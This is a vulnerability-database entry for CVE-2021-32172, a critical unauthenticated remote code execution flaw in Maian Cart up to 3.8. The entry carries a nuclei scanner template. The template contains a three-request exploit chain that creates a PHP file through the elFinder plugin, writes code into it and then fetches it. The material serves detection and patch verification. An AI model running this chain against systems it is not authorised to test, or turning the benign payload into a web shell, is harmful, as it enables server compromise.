Lucene search
K

Maian Cart <=3.8 - Remote Code Execution

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

Maian Cart 3.0 to 3.8 elFinder file manager plugin contains remote code execution vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Maian-Cart 3.8 - Remote Code Execution (Unauthenticated) Exploit
8 Oct 202100:00
zdt
Circl
CVE-2021-32172
27 Apr 202309:58
circl
CNNVD
Maian Script World Maian Cart 安全漏洞
7 Oct 202100:00
cnnvd
CVE
CVE-2021-32172
7 Oct 202110:18
cve
Cvelist
CVE-2021-32172
7 Oct 202110:18
cvelist
Exploit DB
Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
8 Oct 202100:00
exploitdb
NVD
CVE-2021-32172
7 Oct 202111:15
nvd
OSV
CVE-2021-32172
7 Oct 202111:15
osv
Packet Storm
Maian-Cart 3.8 Remote Code Execution
8 Oct 202100:00
packetstorm
Prion
Improper access control
7 Oct 202111:15
prion
Rows per page
id: CVE-2021-32172

info:
  name: Maian Cart <=3.8 - Remote Code Execution
  author: pdteam
  severity: critical
  description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability.
  reference:
    - https://dreyand.github.io/maian-cart-rce/
    - https://github.com/DreyAnd/maian-cart-rce
    - https://www.maianscriptworld.co.uk/critical-updates
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32172
    - https://www.maianscriptworld.co.uk/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-32172
    cwe-id: CWE-862
    epss-score: 0.66433
    epss-percentile: 0.99191
    cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: maianscriptworld
    product: maian_cart
  tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld,vkev,vuln

http:
  - raw:
      - |
        GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, /; q=0.01
        Accept-Language: en-US,en;q=0.5
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
      - |
        GET /product-downloads/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: dsl
        dsl:
          - contains(body_3, "{{randstr_1}}")
          - status_code_3 == 200
        condition: and

    extractors:
      - type: regex
        name: hash
        group: 1
        regex:
          - '"hash"\:"(.*?)"\,'
        internal: true
# digest: 490a0046304402201c26c3f00a92bf4a366b126041fde079161bc5e269c1c3ef0a1ab0e71abdb86f0220138c22df9126cec383214eb3cad491118fcddf50bac344f45d699da70da21195:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
CVSS 3.19.8
EPSS0.66433
32